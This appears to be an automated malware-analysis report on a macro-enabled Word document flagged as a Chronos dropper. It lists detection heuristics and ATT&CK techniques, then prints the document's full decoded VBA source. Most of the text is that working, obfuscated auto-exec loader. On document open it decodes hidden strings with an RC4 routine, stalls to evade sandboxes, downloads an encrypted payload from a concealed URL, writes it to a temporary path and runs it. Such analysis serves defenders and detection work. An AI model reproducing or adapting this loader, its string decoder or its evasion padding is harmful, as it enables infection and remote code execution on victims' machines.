MALICIOUS (Risk Score: 320)
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is an OOXML document containing a VBA project with an obfuscated auto-exec loader, specifically a Document_Open macro that uses CreateObject. This indicates a malicious macro-based document designed to execute a payload. The document body explicitly instructs the user to "Enable Editing" and "Enable Content", a common social engineering tactic. The ClamAV detection name 'Doc.Malware.Chronos-6897935-0' further supports its malicious nature.
Heuristics (10)
- ClamAV: Doc.Malware.Chronos-6897935-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- VBA project inside OOXML [medium, 5 related findings] OOXML_VBA: Document contains a VBA project — VBA macros present
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
  Set UEntF = CreateObject(BisGh2qsZSaI4i(HC4Eh("3CA9F308CFC8C01DAE7825024F506AB2D433546C"), "XRSkY1Qu0EO7Io"))
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
  Matched line in script:
  Set UEntF = CreateObject(BisGh2qsZSaI4i(HC4Eh("3CA9F308CFC8C01DAE7825024F506AB2D433546C"), "XRSkY1Qu0EO7Io"))
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro
  Matched line in script:
  Sub Document_Open()
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON: Environ() call (env variable access)
  Matched line in script:
  TjWxlsut = Environ(BisGh2qsZSaI4i(HC4Eh("F38BE554FBE8BA"), "SrO1U")) & "\" & C0SFQS3rcm1O & BisGh2qsZSaI4i(HC4Eh("65F4D01F"), "LGT80oH28G6azO")
- Macro/content-enable lure [medium] SE_ENABLE_LURE: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12390 bytes |

SHA-256: ec4c101cd1a7471bacf85beddb76cbb6bf4e257cad85a14ca61a8b9a0d78d2bd
Detection
ClamAV: No threats found
Obfuscation or payload: likely. 95 of 184 identifiers look randomly generated (e.g. 'W7VeIIt5Ql0BstfILt5tgQkL'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Function BisGh2qsZSaI4i(ByVal CLCVsW3yt As String, ByVal MzaOxGYPFT2yo As String) As String
Dim Aw3OJyAlDvIYq As Long, MyTy6oIsTsb As Long
Aw3OJyAlDvIYq = 78
MyTy6oIsTsb = 40
If Aw3OJyAlDvIYq + MyTy6oIsTsb > 2 Then
MyTy6oIsTsb = Aw3OJyAlDvIYq + 57
Else
MsgBox 58
End If
On Error Resume Next
Dim TjaNtxNNlIKKEG As Long, YZclLkYn7p2 As Long
TjaNtxNNlIKKEG = 59
YZclLkYn7p2 = 72
If TjaNtxNNlIKKEG + YZclLkYn7p2 > 2 Then
YZclLkYn7p2 = TjaNtxNNlIKKEG + 31
Else
MsgBox 82
End If
Dim X8v8JUH(0 To 255) As Integer, VDZV As Long, SBH7gOqEuH5HdgI As Long, Lgt0NOscKr0 As Long, S55EXOjWN3SP() As Byte, JqKtbyGKDngm7OAiU() As Byte, WdrrAxUSElWZCt As Byte
Dim Ev7jk1yNz As Long, Sth8xy9YZxuSVTi As Long
Ev7jk1yNz = 49
Sth8xy9YZxuSVTi = 80
If Ev7jk1yNz + Sth8xy9YZxuSVTi > 2 Then
Sth8xy9YZxuSVTi = Ev7jk1yNz + 61
Else
MsgBox 66
End If
S55EXOjWN3SP() = StrConv(MzaOxGYPFT2yo, vbFromUnicode)
Dim QpqcYrl226fM7 As Long, OKg928ht As Long
QpqcYrl226fM7 = 69
OKg928ht = 19
If QpqcYrl226fM7 + OKg928ht > 2 Then
OKg928ht = QpqcYrl226fM7 + 19
Else
MsgBox 71
End If
For VDZV = 0 To 255
X8v8JUH(VDZV) = VDZV
Next VDZV
VDZV = 0
SBH7gOqEuH5HdgI = 0
Lgt0NOscKr0 = 0
For VDZV = 0 To 255
SBH7gOqEuH5HdgI = (SBH7gOqEuH5HdgI + X8v8JUH(VDZV) + S55EXOjWN3SP(VDZV Mod Len(MzaOxGYPFT2yo))) Mod 256
WdrrAxUSElWZCt = X8v8JUH(VDZV)
X8v8JUH(VDZV) = X8v8JUH(SBH7gOqEuH5HdgI)
X8v8JUH(SBH7gOqEuH5HdgI) = WdrrAxUSElWZCt
Next VDZV
VDZV = 0
SBH7gOqEuH5HdgI = 0
Lgt0NOscKr0 = 0
JqKtbyGKDngm7OAiU() = StrConv(CLCVsW3yt, vbFromUnicode)
For VDZV = 0 To Len(CLCVsW3yt)
SBH7gOqEuH5HdgI = (SBH7gOqEuH5HdgI + 1) Mod 256
Lgt0NOscKr0 = (Lgt0NOscKr0 + X8v8JUH(SBH7gOqEuH5HdgI)) Mod 256
WdrrAxUSElWZCt = X8v8JUH(SBH7gOqEuH5HdgI)
X8v8JUH(SBH7gOqEuH5HdgI) = X8v8JUH(Lgt0NOscKr0)
X8v8JUH(Lgt0NOscKr0) = WdrrAxUSElWZCt
JqKtbyGKDngm7OAiU(VDZV) = JqKtbyGKDngm7OAiU(VDZV) Xor (X8v8JUH((X8v8JUH(SBH7gOqEuH5HdgI) + X8v8JUH(Lgt0NOscKr0)) Mod 256))
Next VDZV
Dim CIwwyCggT7nn As Long, IkcY8UId2VHs As Long
CIwwyCggT7nn = 56
IkcY8UId2VHs = 59
If CIwwyCggT7nn + IkcY8UId2VHs > 2 Then
IkcY8UId2VHs = CIwwyCggT7nn + 77
Else
MsgBox 95
End If
BisGh2qsZSaI4i = StrConv(JqKtbyGKDngm7OAiU, vbUnicode)
Dim Ey928ht As Long, DlOX6tGmePtLm As Long
Ey928ht = 57
DlOX6tGmePtLm = 2
If Ey928ht + DlOX6tGmePtLm > 2 Then
DlOX6tGmePtLm = Ey928ht + 70
Else
MsgBox 90
End If
End Function
Function C0SFQS3rcm1O() As String
Dim QGeVs6pkqomFqUzC As Long, XJ2vS1mIjFw As Long
QGeVs6pkqomFqUzC = 77
XJ2vS1mIjFw = 40
If QGeVs6pkqomFqUzC + XJ2vS1mIjFw > 2 Then
XJ2vS1mIjFw = QGeVs6pkqomFqUzC + 79
Else
MsgBox 89
End If
Dim IkOqnKKePv() As Byte, W5ZCirTxDiID() As Byte, KEhMxCpW As Long, PJmv5HFiQVJG As Long, Qsm48HB9isGh2qsZS As String, Kg9jxEn7KgKAR As String, EIM As Long
Dim XVlEwdbHQZc9 As Long, Nah As Long
XVlEwdbHQZc9 = 66
Nah = 75
If XVlEwdbHQZc9 + Nah > 2 Then
Nah = XVlEwdbHQZc9 + 47
Else
MsgBox 60
End If
EIM = 0
Dim AzXAblWSIFbZ As Long, GotofXNR As Long
AzXAblWSIFbZ = 24
GotofXNR = 27
If AzXAblWSIFbZ + GotofXNR > 2 Then
GotofXNR = AzXAblWSIFbZ + 45
Else
MsgBox 90
End If
YT0ph65PeZL5eil:
Dim JaYPh As Long, PgJTFpK5Nedf As Long
JaYPh = 82
PgJTFpK5Nedf = 6
If JaYPh + PgJTFpK5Nedf > 2 Then
PgJTFpK5Nedf = JaYPh + 34
Else
MsgBox 97
End If
Randomize
Kg9jxEn7KgKAR = Int(30 * Rnd)
If Kg9jxEn7KgKAR < 4 Then GoTo YT0ph65PeZL5eil
EIM = Kg9jxEn7KgKAR
If EIM > 0& Then
Dim Y5OpqZvRWPgnay1r As Long, XZnzXAblWSI As Long
Y5OpqZvRWPgnay1r = 1
XZnzXAblWSI = 50
If Y5OpqZvRWPgnay1r + XZnzXAblWSI > 2 Then
XZnzXAblWSI = Y5OpqZvRWPgnay1r + 50
Else
MsgBox 3
End If
Qsm48HB9isGh2qsZS = BisGh2qsZSaI4i(HC4Eh("007B6E66BF9A5183A73C"), "O8yKbvLXKLok4D")
Randomize
IkOqnKKePv = Qsm48HB9isGh2qsZS
KEhMxCpW = Len(Qsm48HB9isGh2qsZS) - 1&
EIM = (EIM * 2&) - 1&
ReDim W5ZCirTxDiID(EIM) As Byte
Dim Gux1bV As Long, LonguECPh As Long
Gux1bV = 82
LonguECPh = 52
If Gux1bV + LonguECPh > 2 Then
LonguECPh = Gux1bV + 43
Else
MsgBox 22
End If
For PJmv5HFiQVJG = 0& To EIM Step 2&
W5ZCirTxDiID(PJmv5HFiQVJG) = IkOqnKKePv(CLng(KEhMxCpW * Rnd) * 2&)
Next
Dim RLK5wSqSooX As Long, Q3k6D3KgMJxA2A2 As Long
RLK5wSqSooX = 87
Q3k6D3KgMJxA2A2 = 90
If RLK5wSqSooX + Q3k6D3KgMJxA2A2 > 2 Then
Q3k6D3KgMJxA2A2 = RLK5wSqSooX + 9
Else
MsgBox 27
End If
End If
Dim Kiv1eQnKgMJxA2A2 As Long, VnupQRCjB As Long
Kiv1eQnKgMJxA2A2 = 45
VnupQRCjB = 62
If Kiv1eQnKgMJxA2A2 + VnupQRCjB > 2 Then
VnupQRCjB = Kiv1eQnKgMJxA2A2 + 64
Else
MsgBox 60
End If
C0SFQS3rcm1O = W5ZCirTxDiID
Dim WFBGT5OKR As Long, Iamv9aQEjfVY As Long
WFBGT5OKR = 17
Iamv9aQEjfVY = 49
If WFBGT5OKR + Iamv9aQEjfVY > 2 Then
Iamv9aQEjfVY = WFBGT5OKR + 77
Else
MsgBox 19
End If
End Function
Sub VVPFG1308C2spDIWn(RtRw0 As Long)
Dim FgBKi1HzznODsi As Long, Sx1bVnupQ As Long
FgBKi1HzznODsi = 29
Sx1bVnupQ = 39
If FgBKi1HzznODsi + Sx1bVnupQ > 2 Then
Sx1bVnupQ = FgBKi1HzznODsi + 10
Else
MsgBox 96
End If
Dim BubaBeerHmG5Yai As Long
Dim XFz9iPa As Long, Hgn2dId6 As Long
XFz9iPa = 8
Hgn2dId6 = 53
If XFz9iPa + Hgn2dId6 > 2 Then
Hgn2dId6 = XFz9iPa + 65
Else
MsgBox 79
End If
BubaBeerHmG5Yai = Timer + RtRw0
Do While Timer < BubaBeerHmG5Yai
DoEvents
Loop
Dim X3GpAHbh As Long, LSSA55sOa As Long
X3GpAHbh = 28
LSSA55sOa = 91
If X3GpAHbh + LSSA55sOa > 2 Then
LSSA55sOa = X3GpAHbh + 48
Else
MsgBox 78
End If
End Sub
Sub Document_Open()
Dim IgZu87nNEETIb0jy As Long, ABk2pCGcv5mul As Long
IgZu87nNEETIb0jy = 72
ABk2pCGcv5mul = 60
If IgZu87nNEETIb0jy + ABk2pCGcv5mul > 2 Then
ABk2pCGcv5mul = IgZu87nNEETIb0jy + 95
Else
MsgBox 89
End If
Dim MAS5R3C4xPbd As Long, IoPomHjvlGg As Long, XTgiXBJhRsNOxn As Long
Dim FSE2FuWYk28 As Long, K6rIFQhggSk As Long
FSE2FuWYk28 = 9
K6rIFQhggSk = 97
If FSE2FuWYk28 + K6rIFQhggSk > 2 Then
K6rIFQhggSk = FSE2FuWYk28 + 32
Else
MsgBox 27
End If
MAS5R3C4xPbd = 989218552: IoPomHjvlGg = 0: XTgiXBJhRsNOxn = 0
Dim Yb6W6D4sT3x As Long, DWnGEfxAXwjAIL As Long
Yb6W6D4sT3x = 49
DWnGEfxAXwjAIL = 3
If Yb6W6D4sT3x + DWnGEfxAXwjAIL > 2 Then
DWnGEfxAXwjAIL = Yb6W6D4sT3x + 41
Else
MsgBox 1
End If
For IoPomHjvlGg = 1 To MAS5R3C4xPbd
XTgiXBJhRsNOxn = XTgiXBJhRsNOxn + 1
Next IoPomHjvlGg
Dim Cgt1IgIo7tTK1 As Long, SDERiA9zLtxK As Long
Cgt1IgIo7tTK1 = 57
SDERiA9zLtxK = 77
If Cgt1IgIo7tTK1 + SDERiA9zLtxK > 2 Then
SDERiA9zLtxK = Cgt1IgIo7tTK1 + 44
Else
MsgBox 44
End If
If XTgiXBJhRsNOxn = MAS5R3C4xPbd Then
Dim Gko0yKjP As Long, M89edfLoAL4 As Long
Gko0yKjP = 35
M89edfLoAL4 = 45
If Gko0yKjP + M89edfLoAL4 > 2 Then
M89edfLoAL4 = Gko0yKjP + 16
Else
MsgBox 3
End If
O8jUS6vnxz
Dim IahFtJOsViR8hTKCW As Long, EiBSYiGOD4G As Long
IahFtJOsViR8hTKCW = 84
EiBSYiGOD4G = 22
If IahFtJOsViR8hTKCW + EiBSYiGOD4G > 2 Then
EiBSYiGOD4G = IahFtJOsViR8hTKCW + 11
Else
MsgBox 90
End If
Else
Dim RffSSCRUQ As Long, CfnbRB As Long
RffSSCRUQ = 39
CfnbRB = 59
If RffSSCRUQ + CfnbRB > 2 Then
CfnbRB = RffSSCRUQ + 26
Else
MsgBox 25
End If
JIi6zJoXxJ4FUx
Dim Xx9SKz55xm9xRTw9RYt As Long, DyDGRwZfB8KiEp0D As Long
Xx9SKz55xm9xRTw9RYt = 89
DyDGRwZfB8KiEp0D = 7
If Xx9SKz55xm9xRTw9RYt + DyDGRwZfB8KiEp0D > 2 Then
DyDGRwZfB8KiEp0D = Xx9SKz55xm9xRTw9RYt + 30
Else
MsgBox 84
End If
End If
Dim Mevly2IQnZyFyL As Long, I8zuLOOSQ As Long
Mevly2IQnZyFyL = 26
I8zuLOOSQ = 25
If Mevly2IQnZyFyL + I8zuLOOSQ > 2 Then
I8zuLOOSQ = Mevly2IQnZyFyL + 1
Else
MsgBox 74
End If
End Sub
Sub O8jUS6vnxz()
Dim YD5dfzOx As Long, HgXJOd2EF As Long
YD5dfzOx = 55
HgXJOd2EF = 11
If YD5dfzOx + HgXJOd2EF > 2 Then
HgXJOd2EF = YD5dfzOx + 70
Else
MsgBox 39
End If
Dim TjWxlsut As String, UEntF As Object, BtkO As Integer
Dim N2MOWdWwO0j As Long, MOBZvxC As Long
N2MOWdWwO0j = 27
MOBZvxC = 22
If N2MOWdWwO0j + MOBZvxC > 2 Then
MOBZvxC = N2MOWdWwO0j + 10
Else
MsgBox 45
End If
TjWxlsut = Environ(BisGh2qsZSaI4i(HC4Eh("F38BE554FBE8BA"), "SrO1U")) & "\" & C0SFQS3rcm1O & BisGh2qsZSaI4i(HC4Eh("65F4D01F"), "LGT80oH28G6azO")
Dim XLiQIh As Long, EaGCChvXnXF As Long
XLiQIh = 91
EaGCChvXnXF = 25
If XLiQIh + EaGCChvXnXF > 2 Then
EaGCChvXnXF = XLiQIh + 98
Else
MsgBox 6
End If
Set UEntF = CreateObject(BisGh2qsZSaI4i(HC4Eh("3CA9F308CFC8C01DAE7825024F506AB2D433546C"), "XRSkY1Qu0EO7Io"))
Dim Gc0u96uQAA62 As Long, Sbul0 As Long
Gc0u96uQAA62 = 79
Sbul0 = 15
If Gc0u96uQAA62 + Sbul0 > 2 Then
Sbul0 = Gc0u96uQAA62 + 82
Else
MsgBox 26
End If
UEntF.Open BisGh2qsZSaI4i(HC4Eh("ADF9E9"), "TJAVWNEr5wffS"), BisGh2qsZSaI4i(HC4Eh("2DDE020F7B5A22E13AA25B42980F6E15900272F5F4EA62C42BAD"), "Y9CsyAOl8HLyT0"), False
Dim W7VeIIt5Ql0BstfILt5tgQkL As Long, WJExnuh49CcbbhJB As Long
W7VeIIt5Ql0BstfILt5tgQkL = 63
WJExnuh49CcbbhJB = 38
If W7VeIIt5Ql0BstfILt5tgQkL + WJExnuh49CcbbhJB > 2 Then
WJExnuh49CcbbhJB = W7VeIIt5Ql0BstfILt5tgQkL + 12
Else
MsgBox 64
End If
UEntF.setRequestHeader BisGh2qsZSaI4i(HC4Eh("3094D20C526AD8C4A42C"), "OKwIQnZyFyL"), BisGh2qsZSaI4i(HC4Eh("07031A21E79693635F4C2E"), "Ko1W3OxLfD9")
UEntF.send
If UEntF.Status = 200 Then
Dim X9MV4QnJ As Long, Wxd1Z As Long
X9MV4QnJ = 29
Wxd1Z = 41
If X9MV4QnJ + Wxd1Z > 2 Then
Wxd1Z = X9MV4QnJ + 77
Else
MsgBox 93
End If
BtkO = FreeFile
Open TjWxlsut For Binary Access Write Lock Write As #BtkO
Put #BtkO, , BisGh2qsZSaI4i(StrConv(UEntF.ResponseBody, vbUnicode), BisGh2qsZSaI4i(HC4Eh("B31BB3295C8CEB02B4"), "LIKoQo"))
Close #BtkO
Dim NiXRELM3UpHAmFN As Long, TdQUv8NUmUNW As Long
NiXRELM3UpHAmFN = 32
TdQUv8NUmUNW = 31
If NiXRELM3UpHAmFN + TdQUv8NUmUNW > 2 Then
TdQUv8NUmUNW = NiXRELM3UpHAmFN + 7
Else
MsgBox 80
End If
VVPFG1308C2spDIWn 1
Dim DhskpMx As Long, Ht4FYWcJVV As Long
DhskpMx = 93
Ht4FYWcJVV = 49
If DhskpMx + Ht4FYWcJVV > 2 Then
Ht4FYWcJVV = DhskpMx + 9
Else
MsgBox 78
End If
CreateObject(BisGh2qsZSaI4i(HC4Eh("72A35343258EBB027022F2EC9B"), "EKo0qpqY20IW")).Run """" & TjWxlsut & """"
Dim GVHU As Long, PIPIlv As Long
GVHU = 76
PIPIlv = 76
If GVHU + PIPIlv > 2 Then
PIPIlv = GVHU + 29
Else
MsgBox 45
End If
End If
Dim UG8inCV As Long, GvtUO0xjBrviph As Long
UG8inCV = 86
GvtUO0xjBrviph = 96
If UG8inCV + GvtUO0xjBrviph > 2 Then
GvtUO0xjBrviph = UG8inCV + 67
Else
MsgBox 54
End If
Set UEntF = Nothing
Dim OoO7WgL3f6 As Long, W8UfMpFAk6r7wDmpd As Long
OoO7WgL3f6 = 32
W8UfMpFAk6r7wDmpd = 8
If OoO7WgL3f6 + W8UfMpFAk6r7wDmpd > 2 Then
W8UfMpFAk6r7wDmpd = OoO7WgL3f6 + 8
Else
MsgBox 60
End If
End Sub
Sub JIi6zJoXxJ4FUx()
Dim ILB4LXq As Long, VZOXHoYG As Long
ILB4LXq = 29
VZOXHoYG = 17
If ILB4LXq + VZOXHoYG > 2 Then
VZOXHoYG = ILB4LXq + 52
Else
MsgBox 47
End If
LOF 19
If CDate(74) = True Then TObfXnLxh = 8210
ChDir 29
DateSerial 69, 95, 71
GetSetting 45, 96, 40
Iw8sFmuEJPo = EOF(38)
L9q5ZQK4yXwj = CVErr(91)
LoadPicture 56, 89, 62, 70, 20
AppActivate 70
DoEvents
DateAdd "MRQ3g", 92, 80
If CByte(16) = True Then G5byjhGK5 = 1054
Loc 95
TimeSerial 43, 28, 21
TimeValue 43
Switch 75
GPM5Nqt6HX = LCase(4)
Stop
GetAllSettings 45, 22
Hnx1mlVul5w = CurDir
FV 40, 85, 75
FreeFile 32
Rate 35, 97, 37
Year 47
Partition 63, 42, 4, 21
BzqIvVDfm = CStr(22)
DeleteSetting "BFaaH0VR1HwM"
If CBool(19) = True Then KlPRblWBjELLi = 28
Month 72
HZuGrM5 = QBColor(85)
Dim V2ue4kzqbxbDiQ6PQ As Long, GJHeAk As Long
V2ue4kzqbxbDiQ6PQ = 27
GJHeAk = 51
If V2ue4kzqbxbDiQ6PQ + GJHeAk > 2 Then
GJHeAk = V2ue4kzqbxbDiQ6PQ + 5
Else
MsgBox 43
End If
End Sub
Function HC4Eh(MMBN9ASIg As String) As String
Dim Rxai9aZnaw As Long, OOObBva2nq As Long
Rxai9aZnaw = 21
OOObBva2nq = 94
If Rxai9aZnaw + OOObBva2nq > 2 Then
OOObBva2nq = Rxai9aZnaw + 47
Else
MsgBox 90
End If
Dim VbGuVpS0UMsm48HB9 As Integer
Dim TK1L7otYaw9d4S As Long, YA3jZXjVOWURAe As Long
TK1L7otYaw9d4S = 96
YA3jZXjVOWURAe = 16
If TK1L7otYaw9d4S + YA3jZXjVOWURAe > 2 Then
YA3jZXjVOWURAe = TK1L7otYaw9d4S + 83
Else
MsgBox 82
End If
For VbGuVpS0UMsm48HB9 = 1 To Len(MMBN9ASIg) Step 2
HC4Eh = HC4Eh & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(MMBN9ASIg, VbGuVpS0UMsm48HB9, 2)))
Next
Dim I5ABva2nq As Long, RKGUxUhZjOCfIz As Long
I5ABva2nq = 66
RKGUxUhZjOCfIz = 60
If I5ABva2nq + RKGUxUhZjOCfIz > 2 Then
RKGUxUhZjOCfIz = I5ABva2nq + 4
Else
MsgBox 46
End If
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 33280 bytes |

SHA-256: dab859642ecfd89cc1bf14485454bfd0ecc91139c73bc6d271879d8d1aef2a47
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely